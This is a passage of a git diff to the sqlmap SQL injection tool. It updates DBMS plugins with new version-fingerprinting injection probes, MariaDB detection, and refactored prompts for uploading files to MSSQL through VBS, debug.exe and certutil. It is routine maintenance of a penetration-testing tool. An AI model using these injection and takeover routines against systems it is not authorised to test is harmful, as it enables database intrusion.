Enumeration(GenericEnumeration): def searchTable(self): foundTbls = {} - tblList = conf.tbl.split(",") - rootQuery = queries[Backend.getIdentifiedDbms()].search_table + tblList = conf.tbl.split(',') + rootQuery = queries[DBMS.MSSQL].search_table tblCond = rootQuery.inband.condition tblConsider, tblCondParam = self.likeOrExact("table") - if conf.db and conf.db != CURRENT_DB: - enumDbs = conf.db.split(",") + if conf.db == CURRENT_DB: + conf.db = self.getCurrentDb() + + if conf.db: + enumDbs = conf.db.split(',') elif not len(kb.data.cachedDbs): enumDbs = self.getDbs() else: @@ -184,7 +187,7 @@ class Enumeration(GenericEnumeration): infoMsg = "searching table" if tblConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) logger.info(infoMsg) @@ -217,7 +220,7 @@ class Enumeration(GenericEnumeration): else: infoMsg = "fetching number of table" if tblConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(db)) logger.info(infoMsg) @@ -229,7 +232,7 @@ class Enumeration(GenericEnumeration): if not isNumPosStrValue(count): warnMsg = "no table" if tblConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s' " % unsafeSQLIdentificatorNaming(tbl) warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(db) logger.warn(warnMsg) @@ -260,13 +263,13 @@ class Enumeration(GenericEnumeration): self.dumpFoundTables(foundTbls) def searchColumn(self): - rootQuery = queries[Backend.getIdentifiedDbms()].search_column + rootQuery = queries[DBMS.MSSQL].search_column foundCols = {} dbs = {} whereTblsQuery = "" infoMsgTbl = "" infoMsgDb = "" - colList = conf.col.split(",") + colList = conf.col.split(',') if conf.excludeCol: colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] @@ -277,8 +280,11 @@ class Enumeration(GenericEnumeration): tblCond = rootQuery.inband.condition2 colConsider, colCondParam = self.likeOrExact("column") - if conf.db and conf.db != CURRENT_DB: - enumDbs = conf.db.split(",") + if conf.db == CURRENT_DB: + conf.db = self.getCurrentDb() + + if conf.db: + enumDbs = conf.db.split(',') elif not len(kb.data.cachedDbs): enumDbs = self.getDbs() else: @@ -295,22 +301,25 @@ class Enumeration(GenericEnumeration): infoMsg = "searching column" if colConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column) foundCols[column] = {} if conf.tbl: - _ = conf.tbl.split(",") + _ = conf.tbl.split(',') whereTblsQuery = " AND (" + " OR ".join("%s = '%s'" % (tblCond, unsafeSQLIdentificatorNaming(tbl)) for tbl in _) + ")" infoMsgTbl = " for table%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(tbl for tbl in _)) - if conf.db and conf.db != CURRENT_DB: - _ = conf.db.split(",") + if conf.db == CURRENT_DB: + conf.db = self.getCurrentDb() + + if conf.db: + _ = conf.db.split(',') infoMsgDb = " in database%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(db for db in _)) elif conf.excludeSysDbs: - infoMsg2 = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList)) - logger.info(infoMsg2) + msg = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList)) + logger.info(msg) else: infoMsgDb = " across all databases" @@ -336,7 +345,7 @@ class Enumeration(GenericEnumeration): values = [values] for foundTbl in values: - foundTbl = safeSQLIdentificatorNaming(foundTbl, True) + foundTbl = safeSQLIdentificatorNaming(unArrayizeValue(foundTbl), True) if foundTbl is None: continue @@ -367,7 +376,7 @@ class Enumeration(GenericEnumeration): infoMsg = "fetching number of tables containing column" if colConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s' in database '%s'" % (column, db) logger.info("%s%s" % (infoMsg, infoMsgTbl)) @@ -380,7 +389,7 @@ class Enumeration(GenericEnumeration): if not isNumPosStrValue(count): warnMsg = "no tables contain column" if colConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s' " % column warnMsg += "in database '%s'" % db logger.warn(warnMsg) diff --git a/plugins/dbms/mssqlserver/filesystem.py b/plugins/dbms/mssqlserver/filesystem.py index 53e197a0d..9d1edf9b8 100644 --- a/plugins/dbms/mssqlserver/filesystem.py +++ b/plugins/dbms/mssqlserver/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -382,27 +382,24 @@ class Filesystem(GenericFilesystem): if written is False: message = "do you want to try to upload the file with " message += "the custom Visual Basic script technique? [Y/n] " - choice = readInput(message, default="Y") - if not choice or choice.lower() == "y": + if readInput(message, default='Y', boolean=True): self._stackedWriteFileVbs(tmpPath, wFileContent, dFile, fileType) written = self.askCheckWrittenFile(wFile, dFile, forceCheck) if written is False: message = "do you want to try to upload the file with " message += "the built-in debug.exe technique? [Y/n] " - choice = readInput(message, default="Y") - if not choice or choice.lower() == "y": + if readInput(message, default='Y', boolean=True): self._stackedWriteFileDebugExe(tmpPath, wFile, wFileContent, dFile, fileType) written = self.askCheckWrittenFile(wFile, dFile, forceCheck) if written is False: message = "do you want to try to upload the file with " message += "the built-in certutil.exe technique? [Y/n] " - choice = readInput(message, default="Y") - if not choice or choice.lower() == "y": + if readInput(message, default='Y', boolean=True): self._stackedWriteFileCertutilExe(tmpPath, wFile, wFileContent, dFile, fileType) written = self.askCheckWrittenFile(wFile, dFile, forceCheck) diff --git a/plugins/dbms/mssqlserver/fingerprint.py b/plugins/dbms/mssqlserver/fingerprint.py index 8483b6429..5ce6b10a8 100644 --- a/plugins/dbms/mssqlserver/fingerprint.py +++ b/plugins/dbms/mssqlserver/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -65,9 +65,7 @@ class Fingerprint(GenericFingerprint): return value def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(MSSQL_ALIASES) \ - or (conf.dbms or "").lower() in MSSQL_ALIASES) and Backend.getVersion() and \ - Backend.getVersion().isdigit(): + if not conf.extensiveFp and Backend.isDbmsWithin(MSSQL_ALIASES): setDbms("%s %s" % (DBMS.MSSQL, Backend.getVersion())) self.getBanner() @@ -93,7 +91,9 @@ class Fingerprint(GenericFingerprint): for version, check in (("2000", "HOST_NAME()=HOST_NAME()"), \ ("2005", "XACT_STATE()=XACT_STATE()"), \ ("2008", "SYSDATETIME()=SYSDATETIME()"), \ - ("2012", "CONCAT(NULL,NULL)=CONCAT(NULL,NULL)")): + ("2012", "CONCAT(NULL,NULL)=CONCAT(NULL,NULL)"), \ + ("2014", "CHARINDEX('12.0.2000',@@version)>0"), \ + ("2016", "ISJSON(NULL) IS NULL")): result = inject.checkBooleanExpression(check) if result: diff --git a/plugins/dbms/mssqlserver/syntax.py b/plugins/dbms/mssqlserver/syntax.py index 314ba5c8d..2d220dd37 100644 --- a/plugins/dbms/mssqlserver/syntax.py +++ b/plugins/dbms/mssqlserver/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/mssqlserver/takeover.py b/plugins/dbms/mssqlserver/takeover.py index e387d4095..1216c9a6e 100644 --- a/plugins/dbms/mssqlserver/takeover.py +++ b/plugins/dbms/mssqlserver/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/mysql/__init__.py b/plugins/dbms/mysql/__init__.py index 7baec6ce9..305971ddf 100644 --- a/plugins/dbms/mysql/__init__.py +++ b/plugins/dbms/mysql/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/mysql/connector.py b/plugins/dbms/mysql/connector.py index 62e073425..4c6c2eb04 100644 --- a/plugins/dbms/mysql/connector.py +++ b/plugins/dbms/mysql/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -11,6 +11,7 @@ except ImportError: pass import logging +import struct from lib.core.data import conf from lib.core.data import logger @@ -38,6 +39,8 @@ class Connector(GenericConnector): self.connector = pymysql.connect(host=self.hostname, user=self.user, passwd=self.password, db=self.db, port=self.port, connect_timeout=conf.timeout, use_unicode=True) except (pymysql.OperationalError, pymysql.InternalError), msg: raise SqlmapConnectionException(msg[1]) + except struct.error, msg: + raise SqlmapConnectionException(msg) self.initCursor() self.printConnected() diff --git a/plugins/dbms/mysql/enumeration.py b/plugins/dbms/mysql/enumeration.py index 6480d9c7b..75e884c40 100644 --- a/plugins/dbms/mysql/enumeration.py +++ b/plugins/dbms/mysql/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/mysql/filesystem.py b/plugins/dbms/mysql/filesystem.py index 1bfd8f621..6887e02ec 100644 --- a/plugins/dbms/mysql/filesystem.py +++ b/plugins/dbms/mysql/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/mysql/fingerprint.py b/plugins/dbms/mysql/fingerprint.py index 700badb4f..b094a4fc8 100644 --- a/plugins/dbms/mysql/fingerprint.py +++ b/plugins/dbms/mysql/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -10,14 +10,16 @@ import re from lib.core.common import Backend from lib.core.common import Format from lib.core.common import getUnicode +from lib.core.common import hashDBRetrieve +from lib.core.common import hashDBWrite from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.enums import DBMS +from lib.core.enums import HASHDB_KEYS from lib.core.enums import OS from lib.core.session import setDbms from lib.core.settings import MYSQL_ALIASES -from lib.core.settings import UNKNOWN_DBMS_VERSION from lib.request import inject from plugins.generic.fingerprint import Fingerprint as GenericFingerprint @@ -37,17 +39,18 @@ class Fingerprint(GenericFingerprint): return None - # MySQL valid versions updated on 04/2011 + # Reference: https://downloads.mysql.com/archives/community/ versions = ( (32200, 32235), # MySQL 3.22 (32300, 32359), # MySQL 3.23 (40000, 40032), # MySQL 4.0 (40100, 40131), # MySQL 4.1 - (50000, 50092), # MySQL 5.0 - (50100, 50156), # MySQL 5.1 + (50000, 50096), # MySQL 5.0 + (50100, 50172), # MySQL 5.1 (50400, 50404), # MySQL 5.4 - (50500, 50521), # MySQL 5.5 - (50600, 50604), # MySQL 5.6 + (50500, 50554), # MySQL 5.5 + (50600, 50635), # MySQL 5.6 + (50700, 50717), # MySQL 5.7 (60000, 60014), # MySQL 6.0 ) @@ -91,18 +94,22 @@ class Fingerprint(GenericFingerprint): value = "" wsOsFp = Format.getOs("web server", kb.headersFp) - if wsOsFp and not hasattr(conf, "api"): + if wsOsFp and not conf.api: value += "%s\n" % wsOsFp if kb.data.banner: dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) - if dbmsOsFp and not hasattr(conf, "api"): + if dbmsOsFp and not conf.api: value += "%s\n" % dbmsOsFp value += "back-end DBMS: " actVer = Format.getDbms() + _ = hashDBRetrieve(HASHDB_KEYS.DBMS_FORK) + if _: + actVer += " (%s fork)" % _ + if not conf.extensiveFp: value += actVer return value @@ -142,15 +149,7 @@ class Fingerprint(GenericFingerprint): * http://dev.mysql.com/doc/refman/6.0/en/news-6-0-x.html (manual has been withdrawn) """ - if not conf.extensiveFp and (Backend.isDbmsWithin(MYSQL_ALIASES) \ - or (conf.dbms or "").lower() in MYSQL_ALIASES) and Backend.getVersion() and \ - Backend.getVersion() != UNKNOWN_DBMS_VERSION: - v = Backend.getVersion().replace(">", "") - v = v.replace("=", "") - v = v.replace(" ", "") - - Backend.setVersion(v) - + if not conf.extensiveFp and Backend.isDbmsWithin(MYSQL_ALIASES): setDbms("%s %s" % (DBMS.MYSQL, Backend.getVersion())) if Backend.isVersionGreaterOrEqualThan("5"): @@ -169,7 +168,7 @@ class Fingerprint(GenericFingerprint): infoMsg = "confirming %s" % DBMS.MYSQL logger.info(infoMsg) - result = inject.checkBooleanExpression("USER() LIKE USER()") + result = inject.checkBooleanExpression("SESSION_USER() LIKE USER()") if not result: warnMsg = "the back-end DBMS is not %s" % DBMS.MYSQL @@ -177,6 +176,9 @@ class Fingerprint(GenericFingerprint): return False + if hashDBRetrieve(HASHDB_KEYS.DBMS_FORK) is None: + hashDBWrite(HASHDB_KEYS.DBMS_FORK, inject.checkBooleanExpression("VERSION() LIKE '%MariaDB%'") and "MariaDB" or "") + # reading information_schema on some platforms is causing annoying timeout exits # Reference: http://bugs.mysql.com/bug.php?id=15855 diff --git a/plugins/dbms/mysql/syntax.py b/plugins/dbms/mysql/syntax.py index e593a51fb..fb0df1a42 100644 --- a/plugins/dbms/mysql/syntax.py +++ b/plugins/dbms/mysql/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/mysql/takeover.py b/plugins/dbms/mysql/takeover.py index 8d132fb60..07ed27e94 100644 --- a/plugins/dbms/mysql/takeover.py +++ b/plugins/dbms/mysql/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -60,7 +60,7 @@ class Takeover(GenericTakeover): else: self.__plugindir = "%s/lib/mysql/plugin" % self.__basedir - self.__plugindir = ntToPosixSlashes(normalizePath(self.__plugindir)) + self.__plugindir = ntToPosixSlashes(normalizePath(self.__plugindir)) or '.' self.udfRemoteFile = "%s/%s.%s" % (self.__plugindir, self.udfSharedLibName, self.udfSharedLibExt) @@ -74,7 +74,7 @@ class Takeover(GenericTakeover): # NOTE: specifying the relative path as './udf.dll' # saves in @@datadir on both MySQL 4.1 and MySQL 5.0 - self.__datadir = "." + self.__datadir = '.' self.__datadir = ntToPosixSlashes(normalizePath(self.__datadir)) # The DLL can be in either C:\WINDOWS, C:\WINDOWS\system, diff --git a/plugins/dbms/oracle/__init__.py b/plugins/dbms/oracle/__init__.py index 165f92702..94dde3987 100644 --- a/plugins/dbms/oracle/__init__.py +++ b/plugins/dbms/oracle/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/oracle/connector.py b/plugins/dbms/oracle/connector.py index 3777689f4..5117f9d20 100644 --- a/plugins/dbms/oracle/connector.py +++ b/plugins/dbms/oracle/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/oracle/enumeration.py b/plugins/dbms/oracle/enumeration.py index b9318d17f..0cc0059c7 100644 --- a/plugins/dbms/oracle/enumeration.py +++ b/plugins/dbms/oracle/enumeration.py @@ -1,11 +1,10 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ -from lib.core.common import Backend from lib.core.common import getLimitRange from lib.core.common import isAdminFromPrivileges from lib.core.common import isInferenceAvailable @@ -17,6 +16,7 @@ from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries from lib.core.enums import CHARSET_TYPE +from lib.core.enums import DBMS from lib.core.enums import EXPECTED from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapNoneDataException @@ -30,7 +30,7 @@ class Enumeration(GenericEnumeration): def getRoles(self, query2=False): infoMsg = "fetching database users roles" - rootQuery = queries[Backend.getIdentifiedDbms()].roles + rootQuery = queries[DBMS.ORACLE].roles if conf.user == "CU": infoMsg += " for current user" @@ -50,7 +50,7 @@ class Enumeration(GenericEnumeration): condition = rootQuery.inband.condition if conf.user: - users = conf.user.split(",") + users = conf.user.split(',') query += " WHERE " query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users)) @@ -86,7 +86,7 @@ class Enumeration(GenericEnumeration): if not kb.data.cachedUsersRoles and isInferenceAvailable() and not conf.direct: if conf.user: - users = conf.user.split(",") + users = conf.user.split(',') else: if not len(kb.data.cachedUsers): users = self.getUsers() diff --git a/plugins/dbms/oracle/filesystem.py b/plugins/dbms/oracle/filesystem.py index 0428e3fdb..a4678d9aa 100644 --- a/plugins/dbms/oracle/filesystem.py +++ b/plugins/dbms/oracle/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/oracle/fingerprint.py b/plugins/dbms/oracle/fingerprint.py index 4b56b3122..fbcc7aae7 100644 --- a/plugins/dbms/oracle/fingerprint.py +++ b/plugins/dbms/oracle/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -58,7 +58,7 @@ class Fingerprint(GenericFingerprint): return value def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(ORACLE_ALIASES) or (conf.dbms or "").lower() in ORACLE_ALIASES): + if not conf.extensiveFp and Backend.isDbmsWithin(ORACLE_ALIASES): setDbms(DBMS.ORACLE) self.getBanner() @@ -102,7 +102,8 @@ class Fingerprint(GenericFingerprint): infoMsg = "actively fingerprinting %s" % DBMS.ORACLE logger.info(infoMsg) - for version in ("11i", "10g", "9i", "8i"): + # Reference: https://en.wikipedia.org/wiki/Oracle_Database + for version in ("12c", "11g", "10g", "9i", "8i"): number = int(re.search("([\d]+)", version).group(1)) output = inject.checkBooleanExpression("%d=(SELECT SUBSTR((VERSION),1,%d) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1)" % (number, 1 if number < 10 else 2)) diff --git a/plugins/dbms/oracle/syntax.py b/plugins/dbms/oracle/syntax.py index 41d2e9df5..2a2419f91 100644 --- a/plugins/dbms/oracle/syntax.py +++ b/plugins/dbms/oracle/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/oracle/takeover.py b/plugins/dbms/oracle/takeover.py index 1781cd9e0..7258cb9f9 100644 --- a/plugins/dbms/oracle/takeover.py +++ b/plugins/dbms/oracle/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/postgresql/__init__.py b/plugins/dbms/postgresql/__init__.py index 561b13572..4386624b9 100644 --- a/plugins/dbms/postgresql/__init__.py +++ b/plugins/dbms/postgresql/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/postgresql/connector.py b/plugins/dbms/postgresql/connector.py index e60e7777a..8eb9c283c 100644 --- a/plugins/dbms/postgresql/connector.py +++ b/plugins/dbms/postgresql/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/postgresql/enumeration.py b/plugins/dbms/postgresql/enumeration.py index d379c2512..220e80238 100644 --- a/plugins/dbms/postgresql/enumeration.py +++ b/plugins/dbms/postgresql/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/postgresql/filesystem.py b/plugins/dbms/postgresql/filesystem.py index 72cf7c75f..a8a559cad 100644 --- a/plugins/dbms/postgresql/filesystem.py +++ b/plugins/dbms/postgresql/filesystem.py @@ -1,14 +1,13 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import os from lib.core.common import randomInt -from lib.core.data import kb from lib.core.data import logger from lib.core.exception import SqlmapUnsupportedFeatureException from lib.core.settings import LOBLKSIZE diff --git a/plugins/dbms/postgresql/fingerprint.py b/plugins/dbms/postgresql/fingerprint.py index 3391f711e..c40ffbc0c 100644 --- a/plugins/dbms/postgresql/fingerprint.py +++ b/plugins/dbms/postgresql/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -63,7 +63,7 @@ class Fingerprint(GenericFingerprint): * http://www.postgresql.org/docs/9.1/interactive/release.html (up to 9.1.3) """ - if not conf.extensiveFp and (Backend.isDbmsWithin(PGSQL_ALIASES) or (conf.dbms or "").lower() in PGSQL_ALIASES): + if not conf.extensiveFp and Backend.isDbmsWithin(PGSQL_ALIASES): setDbms(DBMS.PGSQL) self.getBanner() @@ -97,8 +97,16 @@ class Fingerprint(GenericFingerprint): infoMsg = "actively fingerprinting %s" % DBMS.PGSQL logger.info(infoMsg) - if inject.checkBooleanExpression("REVERSE('sqlmap')='pamlqs'"): - Backend.setVersion(">= 9.1.0") + if inject.checkBooleanExpression("TO_JSONB(1) IS NOT NULL"): + Backend.setVersion(">= 9.5.0") + elif inject.checkBooleanExpression("JSON_TYPEOF(NULL) IS NULL"): + Backend.setVersionList([">= 9.4.0", "< 9.5.0"]) + elif inject.checkBooleanExpression("ARRAY_REPLACE(NULL,1,1) IS NULL"): + Backend.setVersionList([">= 9.3.0", "< 9.4.0"]) + elif inject.checkBooleanExpression("ROW_TO_JSON(NULL) IS NULL"): + Backend.setVersionList([">= 9.2.0", "< 9.3.0"]) + elif inject.checkBooleanExpression("REVERSE('sqlmap')='pamlqs'"): + Backend.setVersionList([">= 9.1.0", "< 9.2.0"]) elif inject.checkBooleanExpression("LENGTH(TO_CHAR(1,'EEEE'))>0"): Backend.setVersionList([">= 9.0.0", "< 9.1.0"]) elif inject.checkBooleanExpression("2=(SELECT DIV(6,3))"): diff --git a/plugins/dbms/postgresql/syntax.py b/plugins/dbms/postgresql/syntax.py index 7bb904625..07d972fd8 100644 --- a/plugins/dbms/postgresql/syntax.py +++ b/plugins/dbms/postgresql/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/postgresql/takeover.py b/plugins/dbms/postgresql/takeover.py index 0e4794acd..5090f4f9d 100644 --- a/plugins/dbms/postgresql/takeover.py +++ b/plugins/dbms/postgresql/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -48,7 +48,13 @@ class Takeover(GenericTakeover): banVer = kb.bannerFp["dbmsVersion"] - if banVer >= "9.1": + if banVer >= "9.4": + majorVer = "9.4" + elif banVer >= "9.3": + majorVer = "9.3" + elif banVer >= "9.2": + majorVer = "9.2" + elif banVer >= "9.1": majorVer = "9.1" elif banVer >= "9.0": majorVer = "9.0" diff --git a/plugins/dbms/sqlite/__init__.py b/plugins/dbms/sqlite/__init__.py index 0f7dcab83..61cd955ce 100644 --- a/plugins/dbms/sqlite/__init__.py +++ b/plugins/dbms/sqlite/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/sqlite/connector.py b/plugins/dbms/sqlite/connector.py index dae2a3e78..dcb21072a 100644 --- a/plugins/dbms/sqlite/connector.py +++ b/plugins/dbms/sqlite/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/sqlite/enumeration.py b/plugins/dbms/sqlite/enumeration.py index db1d3c954..a9d8295e9 100644 --- a/plugins/dbms/sqlite/enumeration.py +++ b/plugins/dbms/sqlite/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/sqlite/filesystem.py b/plugins/dbms/sqlite/filesystem.py index ed1e5c152..55352b5be 100644 --- a/plugins/dbms/sqlite/filesystem.py +++ b/plugins/dbms/sqlite/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/sqlite/fingerprint.py b/plugins/dbms/sqlite/fingerprint.py index 6c42a6374..35b8eeb76 100644 --- a/plugins/dbms/sqlite/fingerprint.py +++ b/plugins/dbms/sqlite/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -64,7 +64,7 @@ class Fingerprint(GenericFingerprint): * http://www.sqlite.org/cvstrac/wiki?p=LoadableExtensions """ - if not conf.extensiveFp and (Backend.isDbmsWithin(SQLITE_ALIASES) or (conf.dbms or "").lower() in SQLITE_ALIASES): + if not conf.extensiveFp and Backend.isDbmsWithin(SQLITE_ALIASES): setDbms(DBMS.SQLITE) self.getBanner() diff --git a/plugins/dbms/sqlite/syntax.py b/plugins/dbms/sqlite/syntax.py index 53c54f9f6..8728c7b62 100644 --- a/plugins/dbms/sqlite/syntax.py +++ b/plugins/dbms/sqlite/syntax.py @@ -1,13 +1,12 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import binascii -from lib.core.common import Backend from lib.core.common import isDBMSVersionAtLeast from lib.core.settings import UNICODE_ENCODING from plugins.generic.syntax import Syntax as GenericSyntax @@ -19,6 +18,7 @@ class Syntax(GenericSyntax): @staticmethod def escape(expression, quote=True): """ + >>> from lib.core.common import Backend >>> Backend.setVersion('2') ['2'] >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") diff --git a/plugins/dbms/sqlite/takeover.py b/plugins/dbms/sqlite/takeover.py index 65fe09792..30ab0c4d0 100644 --- a/plugins/dbms/sqlite/takeover.py +++ b/plugins/dbms/sqlite/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers 